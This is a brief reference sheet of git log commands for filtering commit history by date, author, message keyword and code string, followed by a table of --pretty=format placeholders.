git log --since=2.weeks
git log --since="2008-01-15"
git log --since="2 years 1 day 3 minutes ago"

# --committer : the user who performed the commit
# --author : the user who authored the change
# search commit messages for a keyword
git log --author=<author> --grep="keyword"
# --author and --grep may each be given multiple times;
# output is limited to commits matching any --author pattern and any --grep pattern
# --all-match further restricts output to commits matching all --grep patterns

# show only commits that add or remove code matching the string
git log -S function_name

Useful options for git log --pretty=format

Option  Description of Output
%H      Commit hash
%h      Abbreviated commit hash
%T      Tree hash
%t      Abbreviated tree hash
%P      Parent hashes
%p      Abbreviated parent hashes
%an     Author name
%ae     Author email
%ad     Author date (format respects the --date= option)
%ar     Author date, relative
%cn     Committer name
%ce     Committer email
%cd     Committer date
%cr     Committer date, relative
%s      Subject